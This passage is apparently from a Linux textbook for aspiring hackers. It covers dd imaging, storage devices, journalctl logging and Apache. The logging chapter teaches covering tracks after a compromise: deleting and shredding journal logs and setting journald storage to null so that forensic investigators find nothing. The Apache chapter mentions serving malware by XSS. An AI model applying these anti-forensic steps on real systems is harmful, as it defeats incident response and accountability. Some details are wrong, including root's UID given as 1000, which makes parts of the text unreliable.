kali> compress HackersArise.*
kali> ls -l
--snip--
-rw-rw-r-- 1 kali kali  5476 Nov 27 2024 13:32 Ha
Note that the compress utility reduced the size of the file to 5,476 bytes, more
than twice the size of bzip2. Also note that the file extension now is .tar.Z
(with an uppercase Z).
To decompress the same file, use uncompress:
kali> uncompress HackersArise.*
You can also use the gunzip command with files that have been compressed
with compress.
Creating Bit-by-Bit or Physical Copies of Storage
Devices

Within the world of information security and hacking, one Linux archiving
command stands above the rest in its usefulness. The dd command makes a
bit-by-bit copy of a file, a filesystem, or even an entire hard drive. This
means that even deleted files are copied (yes, it’s important to know that
your deleted files may be recoverable), making for easy discovery and
recovery. Deleted files will not be copied with most logical copying
utilities, such as cp.
Once a hacker has owned a target system, the dd command will allow them
to copy the entire hard drive or a storage device to their system. In addition,
those people whose job it is to catch hackers—namely, forensic
investigators—will likely use this command to make a physical copy of the
hard drive with deleted files and other artifacts that might be useful for
finding evidence against the hacker.
It’s critical to note that the dd command should not be used for typical day-
to-day copying of files and storage devices because it is very slow; other
commands do the job faster and more efficiently. It is excellent, though,
when you need a copy of a storage device without the filesystem or other
logical structures, such as in a forensic investigation.
The basic syntax for the dd command is as follows:
dd if=inputfile of=outputfile

So, if you wanted to make a physical copy of your flash drive, assuming the
flash drive is sdb (we’ll discuss this designation more in Chapter 10), you
would enter the following:
kali> dd if=/dev/sdb of=/root/flashcopy
1257441=0 records in
1257440+0 records out
7643809280 bytes (7.6 GB) copied, 1220.729 s, 5.2
Let’s break down this command: dd is your physical “copy” command; if
designates your input file, with /dev/sdb representing your flash drive in the
/dev directory; of designates your output file; and /root/flashcopy is the name
of the file you want to copy the physical copy to. (For a more complete
explanation of the Linux system designation of drives within the /dev
directory, see Chapter 10.)
Numerous options are available to use with the dd command, and you can
do a bit of research on these, but among the most useful are the noerror
option and the bs (block size) option. As the name implies, the noerror option
continues to copy even if errors are encountered. The bs option allows you
to determine the block size (the number of bytes read or written per block)
of the data being copied. By default, it is set to 512 bytes, but it can be
changed to speed up the process. Typically, this would be set to the sector

size of the device, most often 4KB (4,096 bytes). With these options, your
command would look like this:
kali> dd if=/dev/media of=/root/flashcopy bs=4096 conv=no
As mentioned, it’s worth doing a little more research on your own, but this
is a good introduction to the command and its common usages.
Summary
Linux has a number of commands to enable you to combine and compress
your files for easier transfer. For combining files, tar is the command of
choice, and you have at least three utilities for compressing files—gzip,
bzip2, and compress—all with different compression ratios. The dd command
goes above and beyond. It enables you to make a physical copy of storage
devices without the logical structures such as a filesystem, allowing you to
recover such artifacts as deleted files.
Exercises
1. Create three scripts to combine, similar to what we did in Chapter 8.
Name them Linux4Hackers1, Linux4Hackers2, and Linux4Hackers3.
2. Create a tarball from these three files. Name the tarball L4H. Note how
the size of the sum of the three files changes when they are tarred

together.
3. Compress the L4H tarball with gzip. Note how the size of the file
changes. Investigate how you can control overwriting existing files. Now
uncompress the L4H file.
4. Repeat Exercise 3 using both bzip2 and compress.
5. Make a physical, bit-by-bit copy of one of your flash drives using the dd
command.
OceanofPDF.com

10
FILESYSTEM AND STORAGE
DEVICE MANAGEMENT

If you are coming from a Windows environment, the way that Linux
represents and manages storage devices will look rather different to you.
You’ve already seen that the filesystem has no physical representation of
the drive, like the C:, D:, or E: system in Windows, but rather has a file tree
structure with / at the top, or root, of it. This chapter takes a look at how
Linux represents storage devices such as hard drives, flash drives, and other
storage devices.
We first look how additional drives and other storage devices are mounted
upon that filesystem, leading up to the / (root) directory. Mounting in this
context simply means attaching drives or disks to the filesystem to make
them accessible to the operating system. For you as a hacker, it’s necessary
to understand the file and storage device management system, both on your
own system and, often, the system of your target. Hackers commonly use
external media to load data, hacking tools, or even their operating system.
Once you’re on your target system, you need to understand what you’re
working with, where to find confidential or other critical files, how to
mount a drive to the target, and whether and where you can put those files
on your system. We cover all of these topics, plus how to manage and
monitor storage devices, in this chapter.
We begin with the directory known as /dev, which you’ve probably already
noticed in the directory structure: dev is short for device, and every device
in Linux is represented by its own file within the /dev directory. Let’s start
out by working with /dev.

The Device Directory /dev
Linux has a special directory that contains files representing each attached
device: the appropriately named /dev directory. As your first introduction,
navigate to the /dev directory and then perform a long listing on it. You
should see something like Listing 10-1.
kali> cd /dev
kali> ls -l
total 0
crw-------   1  root root  10, 175  May 16  12:44
crw-------   1  root root  10, 235  May 16  12:44
drwxr-xr-x   1  root root      160  May 16  12:44
--snip--
lrwxrwxrwx   1  root root        3  May 16  12:44
--snip--
drwxr-xr-x   2  root root       60  May 16  12:44
--snip--
Listing 10-1: A long listing of the /dev directory
The devices are displayed in alphabetical order by default. You may
recognize some of the devices, such as cdrom and cpu, but others have rather
cryptic names. Each device on your system is represented by a file in the
/dev directory, including devices you’ve probably never used or even

realized existed. On the off chance you do, there is a device file waiting to
be used for it.
If you scroll down this screen a bit, you should see more listings of devices:
--snip--
brw-rw----  1  root root        8,     0    May 1
brw-rw----  1  root root        8,     1    May 1
brw-rw----  1  root root        8,     2    May 1
brw-rw----  1  root root        8,     5    May 1
brw-rw----  1  root root        8,     16   May 1
brw-rw----  1  root root        8,     17   May 1
--snip--
Of particular interest are the devices sda1, sda2, sda3, sdb, and sdb1, which are
usually the hard drive and its partitions and a USB flash drive and its
partitions. Let’s take a closer look at these.
How Linux Represents Storage Devices
Linux uses logical labels for drives that are then mounted on the filesystem.
These logical labels will vary depending on where and when the drives are
mounted, meaning the same hard drive might have different labels at
different times.

Originally, Linux represented floppy drives (remember those?) as fd0 and
hard drives as hda. You will still occasionally see these drive
representations on legacy Linux systems, but today most floppy drives are
gone (thank goodness). Even so, old legacy hard drives that used an IDE or
E-IDE interface are still represented in the form hda. Newer Serial ATA
(SATA) interface drives and Small Computer System Interface (SCSI) hard
drives are represented as sda. Drives are sometimes split up into sections
known as partitions, which are represented in the labeling system with
numbers, as you’ll see next.
When systems have more than one hard drive, Linux simply names them
serially by incrementing the last letter in alphabetical order, so the first
drive is sda, and the second drive is sdb, the third drive is sdc, and so on
(see Table 10-1).
Table 10-1: Device-Naming System
Device
file
Description
sda First SATA hard drive
sdb Second SATA hard drive
sdc Third SATA hard drive

Device
file
Description
sdd Fourth SATA hard drive
The serial letter after sd is often referred to as the major number.
Drive Partitions
Some drives can be split into partitions in order to manage and separate
information. For instance, you may want to separate your hard drive so that
your swap file, home directory, and / directory are all on separate partitions
—you might want to do this for a number of reasons, including to share
resources and to relax the default permissions. Linux labels each partition
with a minor number that comes after the drive designation. This way, the
first partition on the first SATA drive would be sda1. The second partition
would then be sda2, the third sda3, and so on, as illustrated in Table 10-2.
Table 10-2: Partition-Labeling System
Partition Description
sda1 The first (1) partition on the first (a) SATA drive

Partition Description
sda2 The second (2) partition on the first (a) drive
sda3 The third (3) partition on the first (a) drive
sda4 The fourth (4) partition on the first (a) drive
At times, you may want to view the partitions on your Linux system to see
which ones you have and how much capacity is available in each. You can
do this by using the fdisk utility. Using the -l switch with fdisk lists all the
partitions of all the drives, as shown in Listing 10-2.
kali> sudo fdisk -l
Disk /dev/sda:  20GiB,  21474836480 bytes,  41943
Units:  sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 b
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x7c06cd70
Device     Boot     Start       End   Sectors    
/dev/sda1    *       2048  39174143  39172096   1
/dev/sda2        39176190  41940991   2764802    
/dev/sda5        39176192  41940991   2764800

Disk /dev/sdb: 29.8 GiB, 31999393792 bytes, 62498
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 b
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0xc3072e18
Device     Boot  Start       End   Sectors   Size
/dev/sdb1           32  62498815  62498784  29.8G
Listining 10-2: Listing partitions with fdisk
As you can see in Listing 10-2, the devices sda1, sda2, and sda5 are listed
in the first stanza. These three devices make up the virtual disk from my
virtual machine, which is a 20GB drive with three partitions, including the
swap partition (sda5), which acts like virtual RAM—similar to page files in
Windows—when RAM capacity is exceeded.
If you scan down Listing 10-2 to the third stanza, you see a second device
output designated sdb1—the b label tells us that this drive is separate from
the first three devices. This is my 64GB flash drive. Note that fdisk
indicates that it is an HPFS/NTFS/ExFAT filesystem type. These file types—High
Performance File System (HPFS), New Technology File System (NTFS),
and Extended File Allocation Table (exFAT)—are not native to Linux
systems but rather to macOS and Windows systems. It’s worth being able to

recognize file types native to different systems when you investigate. The
filesystem might indicate what kind of machine the drive was formatted on,
which can be valuable information. Kali is able to utilize USB flash drives
created on many different operating systems.
As you saw in Chapter 1, the Linux filesystem is structured significantly
differently than are Windows and other proprietary operating systems. On
top of this, the way files are stored and managed is different in Linux, too.
New versions of Windows use an NTFS filesystem, whereas older Windows
systems use File Allocation Table (FAT) systems. Linux uses a number of
different types of filesystems, but the most common are ext2, ext3, and
ext4. These are all iterations of the ext (or extended) filesystem, with ext4
being the latest.
Character and Block Devices
Something else to note about the naming of device files in the /dev directory
is that the first position contains either c or b. You can see this in Listing 10-
1 at the start of most of the entries, and it looks something like this:
crw-------   1  root root  10, 175  May 16  12:44
These letters represent the two ways that devices transfer data in and out.
The c stands for character, and these devices are known, as you might

expect, as character devices. External devices that interact with the system
by sending and receiving data character by character, such as mice or
keyboards, are character devices.
The b stands for the second type: block devices. They communicate in
blocks of data (multiple bytes at a time) and include devices like hard drives
and DVD drives. These devices require higher-speed data throughput and
therefore send and receive data in blocks (many characters or bytes at a
time). Once you know whether a device is a character or block device, you
can easily get more information about it, as you’ll see next.
List Block Devices and Information with lsblk and lsusb
The Linux command lsblk, short for list block, lists some basic information
about each block device listed in /dev. The result is similar to the output
from fdisk -l, but it will also display devices with multiple partitions in a
kind of tree, showing each device with its partitions as branches, and does
not require root privileges to run. In Listing 10-3, for example, we see sda,
with its branches sda1, sda2, and sda5.
kali> lsblk
Name      MAJ:MIN  RM  SIZE  RO  TYPE  MOUNTPOINT
fd0         2:0     1    4K   0  disk
sda1        8:0     0   20G   0  disk
|-sda1      8:1     0 18.7G   0  part  /
|-sda2      8:2     0    1K   0  part

|-sda5      8:5     0  1.3G   0  part  [SWAP]
sdb         8:16    1 29.8G   0  disk
|-sdb1      8.17    1 29.8G   0  disk  /media
sr0         11:0    1  2.7G   0  rom
Listing 10-3: Listing block device information with lsblk
The output may include the floppy drive as fd0 and DVD drive as sr0, even
though neither is on my system—this is simply a holdover from legacy
systems. We can also see information on the mount point of the drive—this
is the position at which the drive was attached to the filesystem. Note that
the hard drive sda1 is mounted at / and the flash drive is mounted at /media.
You’ll see more on the significance of this in the next section.
In addition, at times we may simply want to know whether a USB device is
mounted to our system. If we plug in a new USB flash drive, keyboard,
headset, or SDR, for example, they don’t necessarily attach immediately,
and sometimes not at all. We have a command to check for all attached
USB devices called lsusb.
We can see all attached and ready-to-use USB devices using this simple
command:
kali> lsusb
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation

Bus 001 Device 002: ID 80ee:0021 VirtualBox USB T
Your output may be different based upon what devices are attached to your
system.
Mounting and Unmounting
Most modern operating systems, including most new versions of Linux,
automount storage devices when they’re attached, meaning the new flash
drive or hard drive is automatically attached to the filesystem. For those
new to Linux, mounting might be a foreign subject.
A storage device must be first physically connected to the filesystem and
then logically attached to the filesystem in order for the data to be made
available to the operating system. In other words, even if the device is
physically attached to the system, it is not necessarily logically attached and
available to the operating system. The term mount is a legacy from the early
days of computing when storage tapes (before hard drives) had to be
physically mounted to the computer system—think of those big computers
with spinning tape drives you might have seen in old sci-fi movies.
As mentioned, the point in the directory tree where devices are attached is
known as the mount point. The two main mount points in Linux are /mnt
and /media. As a convention, devices such as external USB devices and
flash drives can be manually mounted at /mnt, but when automatically

mounted, the /media directory is used (though technically any directory can
be used).
Mounting Storage Devices Manually
In some versions of Linux, you need to mount a drive manually in order to
access its content, so this is a skill worth learning. To mount a drive on the
filesystem, use the mount command. The mount point for the device should
be an empty directory; if you mount a device on a directory that has
subdirectories and files, the mounted device will cover the contents of the
directory, making them invisible and unavailable. So, to mount the new
hard drive sdb1 at the /mnt directory, you would enter the following:
kali> sudo mount /dev/sdb1 /mnt
That hard drive should then be available for access. If you want to mount
the flash drive sdc1 at the /media directory, you would enter this:
kali> sudo mount /dev/sdc1 /media
The filesystems on a system that are mounted at boot-time are kept in a file
at /etc/fstab (short for filesystem table), which is read by the system at every
bootup.

Unmounting with umount
If you’re coming from a Mac or Windows background, you’ve probably
unmounted a drive without knowing it. Before you remove a flash drive
from your system, you “eject” it to keep from causing damage to the files
stored on the device. Eject is just another word for unmount.
Similar to the mount command, you can unmount a second hard drive by
entering the umount command followed by the file entry of the device in the
/dev directory, such as /dev/sdb. Note that the command is not spelled
unmount but rather umount (no n).
kali> sudo umount /dev/sdb1
You cannot unmount a device that is busy, so if the system is reading or
writing to the device, you will just receive an error.
Monitoring Filesystems
In this section, we look at some commands for monitoring the state of the
filesystem—a skill necessary for any hacker or system administrator. We’ll
get some information about mounted disks and then check for and fix
errors. Storage devices are particularly error prone, so it’s worth learning
this skill.

Getting Information on Mounted Disks
The command df (for disk free) will provide us with basic information on
any hard disks or mounted devices, such as CD, DVD, and flash drives,
including how much space is being used and how much is available (see
Listing 10-4). Without any options, df defaults to all mounted drives. If you
want to check a different drive, simply follow the df command with the
drive representation you want to check (for example, dfsdb).
kali> df
Filesystem          1K-Blocks      Used  Availabl
Rootfs               19620732  17096196    150478
udev                    10240         0      1024
--snip--
/dev/sdb1            29823024  29712544     11048
Listing 10-4: Getting information on disks and mounted devices with df
The first line of output here shows category headers, and then we get the
information. The disk space is given in 1KB blocks. On the second line, we
see that rootfs has 19,620,732 one-kilobyte blocks, of which it is using
17,096,196 (or about 92 percent), leaving 1,504,788 available. The df
command also tells us that this filesystem is mounted on the top of the
filesystem /.

In the last line, you can see my USB flash drive. Note that it is designated
/dev/sdb1, is nearly 100 percent full, and is mounted at /media/USB3.0.
As a recap, my virtual disk on this system is designated sda1, which breaks
down as follows:
sd SATA hard drive
a First hard drive
1 First partition on that drive
My 64GB flash drive is designated as sdb1, and my external drive as sdc1.
Checking for Errors
The fsck command (short for filesystem check) checks the filesystem for
errors and repairs the damage, if possible, or else puts the bad area into a
bad blocks table to mark it as bad. To run the fsck command, you need to
specify the device file to check. It’s important to note that you must
unmount the drive before running a filesystem check. If you fail to unmount
the mounted device, you will receive the error message shown in Listing
10-5.
kali> fsck
fsck from util-linux 2.20.1
e2fsck 1.42.5 (29-Jul-2024

/dev/sda1 is mounted
e2fsck: Cannot continue, aborting.
Listing 10-5: Trying (and failing) to run an error check on a mounted drive
So, the first step when performing a filesystem check is to unmount the
device. In this case, I will unmount my flash drive to do a filesystem check:
kali> sudo umount /dev/sdb1
I can add the -p option to have fsck automatically repair any problems with
the device, like so:
kali> fsck -p /dev/sdb1
With the device unmounted, I can now check for any bad sectors or other
problems with the device, as follows:
kali> fsck -p /dev/sdb1
fsck from util-linux 2.30.2
exfatfsck 1.2.7
Checking file system on /dev/sdb1.
File system version           1.0
Sector size                 512 bytes

Cluster size                 32 KB
Volume size                7648 MB
Used space                 1265 MB
Available space            6383 MB
Totally 20 directories and 111 files.
File system checking finished. No errors found.
Summary
Understanding how Linux designates and manages its devices is crucial for
any Linux user and hacker. Hackers will need to know what devices are
attached to a system and how much space is available. Because storage
devices often develop errors, we can check and repair those errors with fsck.
The dd command is capable of making a physical copy of a device,
including any deleted files.
Exercises
1. Use the mount and umount commands to mount and unmount your flash
drive.
2. Check the amount of disk space free on your primary hard drive.
3. Check for errors on your flash drive with fsck.
4. Use the dd command to copy the entire contents of one flash drive to
another, including deleted files.

5. Use the lsblk command to determine basic characteristics of your block
devices.
OceanofPDF.com

11
THE LOGGING SYSTEM

For any Linux user, it’s crucial to be knowledgeable in the use of logfiles.
Logfiles store information about events that occur when the operating
system and applications are run, including any errors and security alerts.
Your system will log information automatically based on the series of rules
that I will show you how to configure in this chapter.
As a hacker, you should be aware that a system’s logfiles can be a trail to
your target’s activities and identity, but they can also be a trail to your own
activities on someone else’s system. A hacker, therefore, needs to know
what information they can gather, as well as what can be gathered about
their own actions and methods in order to hide that evidence.
On the other side, anyone securing Linux systems needs to know how to
manage the logging functions to determine whether a system has been
attacked and then decipher what actually happened and who did it.
This chapter shows you how to examine and configure logfiles, as well as
how to remove evidence of your activity and even disable logging
altogether. First, we’ll look at the daemon that does the logging.
The journalctl Utility
Since the publication of the first edition of Linux Basics for Hackers, the
logging system in most Linux distributions, including Kali, has changed.
Previous versions had used the syslog daemon (also known as syslogd). The

newer Linuxes use a software suite known as systemd, which is intended to
standardize how Linux works across all distributions of Linux.
Systemd has a similar control for logging known as journalctl (a journal in
computer-speak is a place where the computer stores activities and events—
in other words, a logging system). This journalctl utility makes retrieving
and viewing logfiles much easier.
One of the key differences between the older syslogd and journald is that
syslogd stored logfiles as simple text files, while journald stores binary files
(zero and ones). This means that the end user (you) has a much easier time
interpreting the logfiles and searching them. The older-style syslog files
were notoriously hard to search and interpret. System administrators often
had to write scripts to search and sort the logs, but journalctl can now do
these types of tasks automatically. To sum up, journalctl will make your life,
as a newcomer to Linux, much easier.
Let’s take a look at it. When we simply enter the command journalctl at the
prompt, all of the logs are displayed on the screen via the more command:
kali> journalctl
May 12 16:43:52 kali systemd[898]: Queued start j
May 12 16:43:52 kali systemd-journald[351]: /var/
May 12 16:43:52 kali systemd[898]: Created slice 
May 12 16:43:52 kali systemd[898]: Created slice

May 12 16:43:52 kali systemd[898]: Reached target
May 12 16:43:52 kali systemd[898]: Reached target
May 12 16:43:52 kali systemd[898]: Starting dbus
May 12 16:43:52 kali systemd[898]: Listening on d
May 12 16:43:52 kali systemd[898]: Listening on g
--snip--
As you can see, journalctl displays all the log entries to your screen, which
can be useful but may actually be too much information. As we will see
later in the chapter, we can have journalctl display a selected portion of its
logs that are of particular interest to us.
First, though, let’s look at the journalctl help screen:
kali> journalctl -h
journalctl [OPTIONS...] [MATCHES...]
Query the journal.
Source Options:
     --system                Show the system jour
     --user                  Show the user journa
  -M --machine=CONTAINER     Operate on local con
  -m --merge                 Show entries from al
  -D --directory=PATH        Show journal files f

--file=PATH             Show journal file
     --root=PATH             Operate on an altern
     --image=PATH            Operate on disk imag
     --image-policy=POLICY   Specify disk image d
     --namespace=NAMESPACE   Show journal data fr
Filtering Options:
  -S --since=DATE            Show entries not old
  -U --until=DATE            Show entries not new
  -c --cursor=CURSOR         Show entries startin
     --after-cursor=CURSOR   Show entries after t
     --cursor-file=FILE      Show entries after c
  -b --boot[=ID]             Show current boot or
  -u --unit=UNIT             Show logs from the s
     --user-unit=UNIT        Show logs from the s
  -t --identifier=STRING     Show entries with th
  -p --priority=RANGE        Show entries with th
     --facility=FACILITY...  Show entries with th
  -g --grep=PATTERN          Show entries with ME
     --case-sensitive[=BOOL] Force case sensitive
  -k --dmesg                 Show kernel message 
Note that journalctl has options for user (--user), date (--since=DATE), priority
(-p), and facility (--facility).
Log Priorities and Facilities

Logging and logfiles reflect the different priorities and facilities of the
operating system and the system administrator. Some logs are very
important and are given a priority of 0 or emerg(ency), while others are less
important and are given priorities of 6 (info) or 7 (debug). The system
administrator can determine which logs have which priority. In addition, the
system administrator can select which priority logs they want to view.
Here is a list of the logging system priorities:
emerg (0)
alert (1)
crit (2)
err (3)
warning (4)
notice (5)
info (6)
debug (7)
To view the highest-priority logfiles, we can construct a journalctl query
using the -p option, such as:
kali> journalctl –p "emerg"
Jun 30 22:59:13 kali kernel: watchdog: BUG: soft 
Jul 01 03:28:06 kali kernel: watchdog: BUG: soft

Jul 02 10:10:26 kali kernel: watchdog: BUG: soft 
--snip--
Notice that we can also use the priority number such as 6 (info):
kali> journalctl –p 6
The journalctl utility also enables us to view the logs of a specific service
using the -u option. To view the logs associated with the apache2 web
server, we can construct a query such as:
kali> journalctl –u apache2
May 28 14:25:48 kali systemd[1]: Starting apache2
May 28 14:25:48 kali apachectl[118241]: AH00558: 
May 28 14:25:48 kali systemd[1]: Started apache2
May 29 00:00:31 kali systemd[1]: Reloading apache
--snip--
This query can be used to find the logs of any service in Linux simply by
appending the -u option followed by the name of the service.
journalctl Queries

One of the major advantages of journalctl is the ability to query the logs
specifically for events, users, and time, as journalctl has a query language
that is very similar to normal human language. For instance, if I wanted to
see only the events in the last 24 hours, I can query:
kali> journalctl –q –-since "24 hours ago"
Figure 11-1 shows the output.
Figure 11-1: The output from a journalctl query
This query quietly retrieves the last 24 hours of log events. In this case, the
-q flag is for “quiet.” It suppresses messages that are very noisy and may
leave traces of your activity.

The journalctl utility also enables you to search for events by user. As you
know, the root user in Linux is designated with the user ID of 1000. So, we
can search for events linked to the root user by building the journalctl query
like this:
kali> journalctl _UID=1000 –-since "24 hours ago"
Figure 11-2 shows the output.
Figure 11-2: The output from a search for user events
This will help determine whether the root user is online and what they may
be doing (only if it triggers a log).
The kernel of any operating system is its heart. It controls the entire
operating system, and it is what makes Linux, Linux. If the kernel is having

problems, we probably want to be aware of that. To view kernel logs, we
can use the -k option (kernel). For kernel logs within the last 24 hours, we
can enter:
kali> journalctl –k -–since "24 hours ago"
Oct 15 14:41:21 kali kernel: Linux version 6.6.9-
Oct 15 14:41:21 kali kernel: Command line: BOOT_I
Oct 15 14:41:21 kali kernel: BIOS-provided physic
Oct 15 14:41:21 kali kernel: BIOS-e820: [mem 0x00
Oct 15 14:41:21 kali kernel: BIOS-e820: [mem 0x00
Oct 15 14:41:21 kali kernel: BIOS-e820: [mem 0x00
Oct 15 14:41:21 kali kernel: BIOS-e820: [mem 0x00
--snip--
Using journalctl to Cover Your Tracks
If you have compromised a system, you want to make certain that you don’t
leave evidence behind that can be traced back to you. Remember, the best
hack is the one that the target never knew happened!
If we compromised the apache2 web server to take control of the system,
the most important place to clean up are the apache2 logs. We can do this
with journalctl, but here we will need root privileges using the sudo
command:

kali> sudo journalctl –u apache2 –-vacuum-time=1d
This command will delete all the logs associated with the apache2 web
server in the past day:
Vacuuming done, freed 0B of archived journals fro
Deleted archived journal /var/log/journal/d3ab02d
Deleted archived journal /var/log/journal/d3ab02d
--snip--
A better and more secure solution is to shred the logfiles. With other file
deletion systems, a skilled investigator is still able to recover the deleted
files (deleted files are simply made available to be overwritten by the file-
system; they still exist until they are overwritten). But suppose there was a
way to delete the file and overwrite it several times, making it much harder
to recover. Lucky for us, Linux has a built-in command, appropriately
named shred, for just this purpose.
To understand how the shred command works, take a quick look at the help
screen by entering the following command:
kali> shred --help
Usage: shred [OPTION]...FILE...
Overwrite the specified FILE(s)repeatedly in orde

for even very expensive hardware probing to recov
--snip--
The full output on your screen shows that the shred command has many
options. In its most basic form, the syntax is simple:
shred <FILE>
On its own, shred will delete the file and overwrite it several times—by
default, shred overwrites four times. Generally, the more times the file is
overwritten, the harder it is to recover, but keep in mind that each overwrite
takes time, so for very large files, shredding may become time-consuming.
Two useful options to include are the -f option, which changes the
permissions on the files to allow overwriting if a permission change is
necessary, and the –n option, which lets you choose how many times to
overwrite the files. As an example, we’ll shred all the logfiles in
/var/log/journal/subdirectory/*.* 10 times using the following command:
kali> shred -f -n 10 /var/log/journal/subdirectory name*.
We need the –f option to give us permission to shred auth files, and we
follow the –n option with the desired number of times to overwrite. After the

path of the file we want to shred, we include the wildcard asterisk so we’re
shredding everything in the subdirectory. Now try to open a logfile:
kali> mousepad /var/log/journal/filename
Once you’ve shredded a file, you’ll see that the contents are indecipherable
gibberish, as shown in Figure 11-3.
Figure 11-3: A shredded logfile
Now if the security engineer or forensic investigator examines the logfiles,
they will find nothing of use because none of it is recoverable!
Disabling Logging
Another option for covering your tracks is simply to disable logging. When
a hacker takes control of a system, they could immediately disable logging
to prevent the system from keeping track of their activities. This, of course,
requires root privileges.
To disable all logging, the hacker could simply stop logging by configuring
journalctl to send logs to null. This means that instead of writing the logs to

a storage device such as a hard drive, the system will send the logs into a
null place (nowhere). We can accomplish this by opening and editing the
journal daemon configuration file. It is at /etc/systemd/journald.conf. You
can open with any text editor, but here I opened it with mousepad preceded
by sudo to gain root privileges:
kali> sudo mousepad /etc/systemd/journald.conf
  This file is part of systemd.
#
#  systemd is free software; you can redistribute
#  terms of the GNU Lesser General Public License
#  Software Foundation; either version 2.1 of the
#  any later version.
#
# Entries in this file show the compile time defa
# should be created by either modifying this file
# /etc/ if the original file is shipped in /usr/)
# the /etc/systemd/journald.conf.d/ directory. Th
# recommended. Defaults can be restored by simply
# configuration file and all drop-ins located in 
#
# Use 'systemd-analyze cat-config systemd/journal
#
# See journald.conf(5) for details.
[Journal]

#Storage=auto
#Compress=yes
--snip--
Note the line at the end that says #Storage=auto. Change that line to
Storage=null and delete the comment mark before it (#). Now save the file
and restart journald:
kali> sudo systemctl restart system-journald
This will stop and start journald, and when it restarts, it will use the new
configuration file that sends all logs to null.
Now Linux will stop generating any logfiles until the service is restarted,
enabling you to operate without leaving behind any evidence in the logfiles!
Summary
Logfiles track nearly everything that happens on your Linux system. They
can be an invaluable resource in trying to analyze what has occurred,
whether it be a malfunction or a hack. For the hacker, logfiles can be
evidence of their activities and identity. However, an astute hacker can
remove and shred these files and disable logging entirely, thus leaving no
evidence behind.

Exercises
1. Query your logfiles with journalctl to find all the logfiles generated in
the last 12 hours.
2. Query your logfiles with journalctl to find all the logfiles associated with
your browser.
3. Edit your journald.conf file to send all the logs to nowhere.
4. Query your logfiles with journalctl to find all the logs of apache2 within
the last 36 hours that are critical.
OceanofPDF.com

12
USING AND ABUSING SERVICES

In Linux terminology, a service is an application that runs in the
background waiting for you to use it. Your Linux system has dozens of
services preinstalled. Of these, the most well known is the ubiquitous
Apache HTTP server, which is used for creating, managing, and deploying
web servers, but there are so many more. For the purposes of this chapter
on services, I have selected just three that are of particular importance to the
hacker: Apache, OpenSSH, MySQL/MariaDB, and PostgreSQL.
In this chapter, you’ll learn how to set up a web server with Apache,
physically spy with OpenSSH, and access data with MySQL/MariaDB.
Starting, Stopping, and Restarting Services
Before we begin to work with these crucial services, let’s examine how to
start, stop, and restart services in Linux.
Some services can be stopped and started via the GUI in Kali Linux, much
as you would on an operating system like Windows or macOS. However,
some services require use of the command line, which we’ll look at here.
Here is the basic syntax for managing services:
sudo systemctl start servicename
To start the apache2 service (web server or HTTP service), enter the
following:

kali> sudo systemctl start apache2
To stop the Apache web server, enter:
kali> sudo systemctl stop apache2
Usually, when you make a configuration change to an application or service
by altering its plaintext configuration file, you need to restart the service to
capture the new configuration. Thus, you would enter the following:
kali> sudo systemctl restart apache2
Now that you understand how to start, stop, and restart services from the
command line, let’s move on to the three most critical Linux services to
hackers.
Creating an HTTP Server with the Apache Web
Server
The Apache web server is probably the most commonly used service on
Linux systems. Apache is found on over 55 percent of the world’s web
servers, so any self-respecting Linux admin should be familiar with it. As a
hacker aspiring to hack websites, it’s critical to understand the inner

workings of Apache, websites, and the backend databases of these sites.
You can also use Apache to set up your own web server, from which you
could serve up malware via cross-site scripting (XSS) to anyone who visits
your site, or you could clone a website and redirect traffic to your site via
abuse of DNS (Domain Name System). In either of these cases, a basic
knowledge of Apache is required.
Starting with Apache
If you have Kali running on your system, Apache is already installed. Many
other Linux distros have it installed by default as well. If you don’t have
Apache installed, you can download and install it from the repositories by
entering the following:
kali> sudo apt install apache2
The Apache web server is often associated with the MySQL database
(which we will look at in the next section), and these two services are very
often paired with a scripting language such as Python or PHP to develop
web applications. This combination of Linux, Apache, MySQL, and PHP or
Python forms a powerful and robust platform for the development and
deployment of web-based applications, known collectively as LAMP. These
are the most widely used tools for developing websites in the Linux world
—and they’re very popular in the Microsoft world too, where they’re
generally referred to as WAMP, with the W standing for Windows.

From the command line, enter the following:
kali> sudo systemctl start apache2
Now that Apache is running in the background, it should be able to serve up
its default web page. Enter http://localhost in your favorite web browser
(Firefox comes with Kali) to bring up the web page, which should look
something like Figure 12-1.
Figure 12-1: The Apache2 web server default page
As you can see, Apache displays “It works!” as its default web page. Now
that you know your Apache web server is working, let’s customize it!
Editing the index.html File
Apache’s default web page is at /var/www/html/index.html. You can edit the
index.html file to serve up whatever information you want, so let’s create

our own. For this, you can use any text editor you please; I’ll be using
mousepad. Open up /var/www/html/index.html, and you should see
something like Listing 12-1.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Tran
"http://www.w3.org/TR/xhtm11/DTD/xhtm11-transitio
<html xmlns="http://www.w3.org/1999/xhtml>
    <head>
        <meta http-equiv="Content-Type" content="
➊ <title>Apache2 Debian Default Page: It works</
        <style type="text/css" media="screen">
  * {
        margin: OpxOpxOpxOpx;
        padding: OpxOpxOpxOpx;
    }
body, html {
    padding: 3px 3px3px3px;
    background-color: #D8DBE2;
    font-family: Verdana, sans-serif;
    font-size: 11pt;
    text-align: center;
}
div.main_page {
    position: relative;

display: table;
--snip--
Listing 12-1: The Apache web server index.html file
Note here that the default web page has exactly the text that was displayed
when we opened our browser to localhost, but in HTML format ➊. All we
need to do is edit or replace this file to have our web server display the
information we want.
Adding Some HTML
Now that we have the web server up and running and the index.html file
open, we can add whatever text we’d like the web server to serve up. We
will create some simple HTML blocks.
Let’s create this page. In a new file in your text editor, enter the code shown
in Listing 12-2.
<html>
<body>
<h1>Hackers-Arise Is the Best! </h1>
<p> If you want to learn hacking, Hackers-Arise.c
<p> is the best place to learn hacking!</p>

</body>
</html>
Listing 12-2: Some simple HTML to add to the index.html file
Once you have entered the text exactly as it appears in Listing 12-2, save
this file as /var/www/html/index.html and close your text editor. Your text
editor will then prompt you that the file already exists. That’s okay. Just
overwrite the existing /var/www/html/index.html file.
Seeing What Happens
Having saved our /var/www/html/index.html file, we can check to see what
Apache will serve up. Navigate your browser once again to http://localhost,
and you should see something like Figure 12-2.
Figure 12-2: The new Hackers-Arise website
Apache has served up our web page just as we created it!

OpenSSH and the Raspberry Spy Pi
